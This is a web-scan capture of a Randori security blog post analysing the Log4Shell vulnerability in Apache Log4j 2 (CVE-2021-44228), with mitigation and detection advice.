www.randori.com
Open in
urlscan Pro
35.225.197.149
Public Scan
URL:
https://www.randori.com/blog/cve-2021-44228/
Submission: On December 16 via api from US — Scanned from DE
Submission: On December 16 via api from US — Scanned from DE
Form analysis 2 forms found in the DOM
POST https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/4663384/e277972f-a069-4cdf-822a-713485701114
<form novalidate="" accept-charset="UTF-8" action="https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/4663384/e277972f-a069-4cdf-822a-713485701114" enctype="multipart/form-data" id="hsForm_e277972f-a069-4cdf-822a-713485701114"
method="POST" class="hs-form stacked hs-form-private hsForm_e277972f-a069-4cdf-822a-713485701114 hs-form-e277972f-a069-4cdf-822a-713485701114 hs-form-e277972f-a069-4cdf-822a-713485701114_11d50f4c-ecb4-414f-bb35-33ea2a65772a"
data-form-id="e277972f-a069-4cdf-822a-713485701114" data-portal-id="4663384" target="target_iframe_e277972f-a069-4cdf-822a-713485701114" data-reactid=".hbspt-forms-0" data-hs-cf-bound="true">
<div class="hs_firstname hs-firstname hs-fieldtype-text field hs-form-field" data-reactid=".hbspt-forms-0.1:$0"><label id="label-firstname-e277972f-a069-4cdf-822a-713485701114" class="" placeholder="Enter your <strong>First name</strong>"
for="firstname-e277972f-a069-4cdf-822a-713485701114" data-reactid=".hbspt-forms-0.1:$0.0"><span data-reactid=".hbspt-forms-0.1:$0.0.0"><strong>First name</strong></span><span class="hs-form-required"
data-reactid=".hbspt-forms-0.1:$0.0.1">*</span></label>
<legend class="hs-field-desc" style="display:none;" data-reactid=".hbspt-forms-0.1:$0.1"></legend>
<div class="input" data-reactid=".hbspt-forms-0.1:$0.$firstname"><input id="firstname-e277972f-a069-4cdf-822a-713485701114" class="hs-input" type="text" name="firstname" required="" value="" placeholder="" autocomplete="given-name"
data-reactid=".hbspt-forms-0.1:$0.$firstname.0" inputmode="text"></div>
</div>
<div class="hs_lastname hs-lastname hs-fieldtype-text field hs-form-field" data-reactid=".hbspt-forms-0.1:$1"><label id="label-lastname-e277972f-a069-4cdf-822a-713485701114" class="" placeholder="Enter your <strong>Last name</strong>"
for="lastname-e277972f-a069-4cdf-822a-713485701114" data-reactid=".hbspt-forms-0.1:$1.0"><span data-reactid=".hbspt-forms-0.1:$1.0.0"><strong>Last name</strong></span><span class="hs-form-required"
data-reactid=".hbspt-forms-0.1:$1.0.1">*</span></label>
<legend class="hs-field-desc" style="display:none;" data-reactid=".hbspt-forms-0.1:$1.1"></legend>
<div class="input" data-reactid=".hbspt-forms-0.1:$1.$lastname"><input id="lastname-e277972f-a069-4cdf-822a-713485701114" class="hs-input" type="text" name="lastname" required="" value="" placeholder="" autocomplete="family-name"
data-reactid=".hbspt-forms-0.1:$1.$lastname.0" inputmode="text"></div>
</div>
<div class="hs_email hs-email hs-fieldtype-text field hs-form-field" data-reactid=".hbspt-forms-0.1:$2"><label id="label-email-e277972f-a069-4cdf-822a-713485701114" class="" placeholder="Enter your <strong>Corporate Email</strong>"
for="email-e277972f-a069-4cdf-822a-713485701114" data-reactid=".hbspt-forms-0.1:$2.0"><span data-reactid=".hbspt-forms-0.1:$2.0.0"><strong>Corporate Email</strong></span><span class="hs-form-required"
data-reactid=".hbspt-forms-0.1:$2.0.1">*</span></label>
<legend class="hs-field-desc" style="display:none;" data-reactid=".hbspt-forms-0.1:$2.1"></legend>
<div class="input" data-reactid=".hbspt-forms-0.1:$2.$email"><input id="email-e277972f-a069-4cdf-822a-713485701114" class="hs-input" type="email" name="email" required="" placeholder="" value="" autocomplete="email"
data-reactid=".hbspt-forms-0.1:$2.$email.0" inputmode="email"></div>
</div><noscript data-reactid=".hbspt-forms-0.2"></noscript>
<div class="hs_submit hs-submit" data-reactid=".hbspt-forms-0.5">
<div class="hs-field-desc" style="display:none;" data-reactid=".hbspt-forms-0.5.0"></div>
<div class="actions" data-reactid=".hbspt-forms-0.5.1"><input type="submit" value="Get Free Log4j Attack Surface Review" class="hs-button primary large" data-reactid=".hbspt-forms-0.5.1.0"></div>
</div><noscript data-reactid=".hbspt-forms-0.6"></noscript><input name="hs_context" type="hidden"
value="{"rumScriptExecuteTime":1080,"rumServiceResponseTime":1553.0999994277954,"rumFormRenderTime":2.1999998092651367,"rumTotalRenderTime":1556.0999994277954,"rumTotalRequestTime":363.5,"isLegacyThemeAllowed":"true","renderRawHtml":"true","lang":"en","sfdcCampaignId":"7011U000000M7CDQA0","embedAtTimestamp":"1639663473619","formDefinitionUpdatedAt":"1639181606611","pageUrl":"https://www.randori.com/blog/cve-2021-44228/","pageTitle":"CVE-2021-44228 - Log4j 2 Vulnerability Analysis - Randori Attack Team","source":"FormsNext-static-5.427","sourceName":"FormsNext","sourceVersion":"5.427","sourceVersionMajor":"5","sourceVersionMinor":"427","timestamp":1639663473619,"userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36","originalEmbedContext":{"region":"na1","portalId":"4663384","formId":"e277972f-a069-4cdf-822a-713485701114","sfdcCampaignId":"7011U000000M7CDQA0","target":"#hbspt-form-1639663473432-9405286289"},"redirectUrl":"https://calendly.com/randori/randori-discussion","renderedFieldsIds":["firstname","lastname","email"],"formTarget":"#hbspt-form-1639663473432-9405286289","correlationId":"9a3475b5-7125-4691-b6af-c44a5baf12ff","hutk":"6f1e0a90164eadd012af94140163033f","captchaStatus":"NOT_APPLICABLE"}"
data-reactid=".hbspt-forms-0.7"><iframe name="target_iframe_e277972f-a069-4cdf-822a-713485701114" style="display:none;" data-reactid=".hbspt-forms-0.8" data-lf-yt-playback-inspected-dzlr5a5e2kyaboq2="true"></iframe>
</form>Name: New Form — POST
<form class="elementor-form" method="post" name="New Form" data-hs-cf-bound="true">
<input type="hidden" name="post_id" value="9119">
<input type="hidden" name="form_id" value="6ae67fc0">
<input type="hidden" name="referer_title" value="CVE-2021-44228 - Log4j 2 Vulnerability Analysis - Randori Attack Team">
<input type="hidden" name="queried_id" value="9579">
<div class="elementor-form-fields-wrapper elementor-labels-above">
<div class="elementor-field-type-text elementor-field-group elementor-column elementor-field-group-name elementor-col-100 elementor-field-required">
<label for="form-field-name" class="elementor-field-label">First Name*</label><input size="1" type="text" name="form_fields[name]" id="form-field-name" class="elementor-field elementor-size-sm elementor-field-textual" required="required"
aria-required="true">
</div>
<div class="elementor-field-type-text elementor-field-group elementor-column elementor-field-group-field_eaa43a3 elementor-col-100 elementor-field-required">
<label for="form-field-field_eaa43a3" class="elementor-field-label">Last Name*</label><input size="1" type="text" name="form_fields[field_eaa43a3]" id="form-field-field_eaa43a3" class="elementor-field elementor-size-sm elementor-field-textual"
required="required" aria-required="true">
</div>
<div class="elementor-field-type-email elementor-field-group elementor-column elementor-field-group-email elementor-col-100 elementor-field-required">
<label for="form-field-email" class="elementor-field-label">Corporate Email*</label><input size="1" type="email" name="form_fields[email]" id="form-field-email" class="elementor-field elementor-size-sm elementor-field-textual"
required="required" aria-required="true">
</div>
<div class="elementor-field-group elementor-column elementor-field-type-submit elementor-col-100 e-form__buttons">
<button type="submit" class="elementor-button elementor-size-sm">
<span>
<span class=" elementor-button-icon">
</span>
<span class="elementor-button-text">Request Demo</span>
</span>
</button>
</div>
</div>
</form>Text Content
This website stores cookies on your computer. These cookies are used to collect
information about how you interact with our website and allow us to remember
you. We use this information in order to improve and customize your browsing
experience and for analytics and metrics about our visitors both on this website
and other media. To find out more about the cookies we use, see our Privacy
Policy.
If you decline, your information won’t be tracked when you visit this website. A
single cookie will be used in your browser to remember your preference not to be
tracked.
Accept Decline
Randori Attack Team CVE-2021-44228 Log4j 2 Vulnerability Analysis
Read Blog
Randori Attack Team CVE-2021-44228 Log4j 2 Vulnerability Analysis
Read Blog
Get Demo
* Use Cases
* Attack Surface Management
* Continuous Automated Red Teaming
* Shadow IT Discovery
* Secure Cloud Migration
* Ransomware Prevention
* Platform
* Platform
* Recon
* Attack
* Integrations
* Log4j
* Log4Shell – What You Need To Know
* CVE-2021-44228 – Log4j 2 Vulnerability Analysis
* Webinar: Log4Shell Deepdive w/ Randori & Greynoise
* Jamf Pro: Log4Shell Impact & Remediations
* VMSA-2021-0028: VMware Log4Shell Impact & Remediations
* Resources
* News & Blog
* Press
* Blog
* About
* About Us
* Careers
* Contact Us
Menu
* Use Cases
* Attack Surface Management
* Continuous Automated Red Teaming
* Shadow IT Discovery
* Secure Cloud Migration
* Ransomware Prevention
* Platform
* Platform
* Recon
* Attack
* Integrations
* Log4j
* Log4Shell – What You Need To Know
* CVE-2021-44228 – Log4j 2 Vulnerability Analysis
* Webinar: Log4Shell Deepdive w/ Randori & Greynoise
* Jamf Pro: Log4Shell Impact & Remediations
* VMSA-2021-0028: VMware Log4Shell Impact & Remediations
* Resources
* News & Blog
* Press
* Blog
* About
* About Us
* Careers
* Contact Us
Get Demo
December 10, 2021
ASM, Recent Posts, Red Teaming, TTPs
CVE-2021-44228 – LOG4J 2 VULNERABILITY ANALYSIS
BY: RANDORI ATTACK TEAM
Share on facebook
Share on twitter
Share on linkedin
Last Update: 4:13pm EST, Dec. 14, 2021 (List of updates at bottom)
WHAT IS LOG4SHELL?
Log4Shell is a high severity vulnerability (CVE-2021-44228, CVSSv3 10.0)
impacting multiple versions of the Apache Log4j 2 utility. It was disclosed
publicly via the project’s GitHub on December 9, 2021. This vulnerability, which
was discovered by Chen Zhaojun of Alibaba Cloud Security Team, impacts Apache
Log4j 2 versions 2.0 to 2.14.1.
The vulnerability allows for unauthenticated remote code execution. Log4j 2 is
an open source Java logging library developed by the Apache Foundation. Log4j 2
is widely used in many applications and is present, as a dependency, in many
services. These include enterprise applications as well as numerous cloud
services.
Initially, there were mixed reports (GitHub, Original Post) as to the
susceptibility of Log4j 1.x. At this time, CVE-2021-4101 has been designated for
the impact to Log4j 1.x. According to RedHat, remote code execution is possible
for some non-default configurations of software running Log4j 1.x. Research by
the security community into the extent of the impact on Log4j 1.x area is
ongoing.
The Randori Attack Team has developed a working exploit and has been able to
successfully leverage this vulnerability in customer environments as part of our
offensive security platform.
The vulnerability is reachable via a multitude of application specific methods.
Effectively, any scenario that allows a remote connection to supply arbitrary
data that is written to log files by an application utilizing the Log4j library
is susceptible to exploitation. This vulnerability is being exploited in the
wild and thousands of organizations are impacted. This vulnerability poses a
significant and active real world risk to affected systems – PLEASE TAKE
IMMEDIATE ACTION.
In analyzing CVE-2021-44228, Randori has determined the following:
* Default installations of widely used enterprise software are vulnerable.
* The vulnerability can be exploited reliably and without authentication.
* The vulnerability affects multiple versions of Log4j 2.
* The vulnerability allows for remote code execution as the user running the
application that utilizes the library.
* Upgrading the underlying version of Java alone is insufficient to prevent
exploitation of the vulnerability.
This is an evolving situation, if you need help – please reach out. Due to the
severity of this issue, Randori is offering any enterprise a free Log4j attack
surface review . We are committed to helping the community not only understand
but respond quickly to this situation.
IMPACT
The Log4j 2 library is very frequently used in enterprise Java software. Due to
this deployment methodology, the impact is difficult to quantify. Similarly to
other high-profile vulnerabilities such as Heartbleed and Shellshock, we believe
there will be an increasing number of vulnerable products discovered in the
weeks to come.
Due to the ease of exploitation and the breadth of applicability, we suspect
ransomware actors to begin leveraging this vulnerability immediately.
Credit: Fastly
RECOMMENDATION
Randori encourages all organizations to adopt an assumed breach mentality and
review logs for impacted applications for unusual activity.
If you find these hashes in your software inventory then you have the vulnerable
log4j library in your systems and need to take action:
https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes
If anomalies are found, we encourage you to assume this is an active incident,
that you have been compromised and respond accordingly.
Upgrading to the patched versions of Log4j 2 or impacted applications will
eliminate this vulnerability. Randori recommends any organization that believes
they may be impacted to update to a patched version urgently.
In the latest update from the Apache Log4j team, they recommend organizations do
the following
* Upgrade to Log4j 2.16.0 (2.15.0 is susceptible to exploitation in non-default
configurations that utilize the ThreadContext class with user-supplied
input.)
* For those who cannot upgrade to 2.16.0,
* in releases >=2.10, this vulnerability can be mitigated by setting either
the system property log4j2.formatMsgNoLookups or the environment variable
LOG4J_FORMAT_MSG_NO_LOOKUPS to true.
* For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove
the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar
org/apache/logging/log4j/core/lookup/JndiLookup.class.
If patching is not possible, it is highly advised organizations apply the
temporary mitigation below and monitor impacted applications closely for
anomalous behavior.
To mitigate the vulnerability in place of updating Log4 2j, the following
parameter should be set to true when starting the Java Virtual Machine:
log4j2.formatMsgNoLookups;
The presence of JAR files belonging to the log4j library can indicate an
application is potentially susceptible to CVE-2021-44228. The specific files to
search for should match the following following pattern:
log4j-core-*.jar;
Depending on the installation method, the location of the matching JAR file may
also give indications as to which application is potentially vulnerable. For
example, on Windows, if the file is located in C:\Program
Files\ApplicationName\log4j-core-version.jar it indicates ApplicationName should
be investigated. On Linux, the lsof utility can show which processes currently
have the JAR file in use and can be run via the following syntax:
lsof /path/to/log4j-core-version.jar;
Currently, detection guidance in the form of regular expression signatures in
the public space appear to be overly broad and bypasses have surfaced to
circumvent them.
Updates to this post:
1. If you find these hashes in your software inventory then you have the
vulnerable log4j in your systems:
https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes
2. The presence of JAR files belonging to the log4j library can indicate an
application is potentially susceptible to CVE-2021-44228. The specific
files to search for should match the following following pattern:
“log4j-core-*.jar”
3. Depending on the installation method, the location of the matching JAR file
may also give indications as to which application is potentially
vulnerable. For example, on Windows, if the file is located in C:\Program
Files\ApplicationName\log4j-core-version.jar it indicates ApplicationName
should be investigated. On Linux, the lsof utility can show which processes
currently have the JAR file in use and can be run via the following syntax:
“lsof /path/to/log4j-core-version.jar;”
4. Currently, detection guidance in the form of regular expression signatures
in the public space appear to be overly broad and bypasses have surfaced to
circumvent them.
5. This issue was discovered by Chen Zhaojun of Alibaba Cloud Security Team.
6. Added to Further Information:
https://logging.apache.org/log4j/2.x/security.html
7. Details regarding exploitability of VMware products impacted by
VMSA-2021-0028
8. Additional details on VMware mitigations (Full details)
9. Additional details on Jamf mitigations (Full details)
10. Remediation and mitigation guidance from Apache Foundation (Link)
11. Updated with clarification that version 1.x of Log4j is not susceptible to
this vulnerability (Link)
12. Updated with clarification that remote code execution is possible for some
non-default configurations of software running Log4j 1.x. (Link)
13. Updated to reflect Randori position that updating your version of Java is
not sufficient to prevent exploitation of the vulnerability.
ADDITIONAL LOG4J CONTENT & RESEARCH FROM RANDORI
* Log4Shell – What You Need to Know
* VSMA-2021-0028: VMware Impact & Remediation Analysis
* Jamf Pro: Log4Shell Impact & Remediation Analysis
FURTHER INFORMATION
[1] https://news.ycombinator.com/item?id=29504755
[2] https://github.com/apache/logging-log4j2/pull/608
[3] https://logging.apache.org/log4j/2.x/security.html
[4] https://www.vmware.com/security/advisories/VMSA-2021-0028.html
[5]
https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j
[6] https://logging.apache.org/log4j/2.x/security.html
[7] https://access.redhat.com/security/cve/CVE-2021-4104
UNDERSTAND YOUR RISK TO LOG4J
Uncover your true attack surface with the only ASM platform built by attackers.
Stay one step ahead of cyber-criminals, hacktivists and nation-state attackers,
by seeing your perimeter as they see it.
First name*
Last name*
Corporate Email*
First Name*
Last Name*
Corporate Email*
Request Demo
Get Demo
RESOURCES
* Webinars
* Infographics
* Ebooks
* Datasheets
USE CASES
* Attack Surface Management
* Continuous Automated Red Teaming
* Secure Cloud Migration
* Shadow IT Discovery
* Ransomware Prevention
COMPANY
* About Us
* Careers
* Contact Us
RANDORI PLATFORM
* Platform
* Recon
* Attack
* Integrations
* Privacy Policy
* Security
* © 2021 Randori all rights reserved
Twitter Linkedin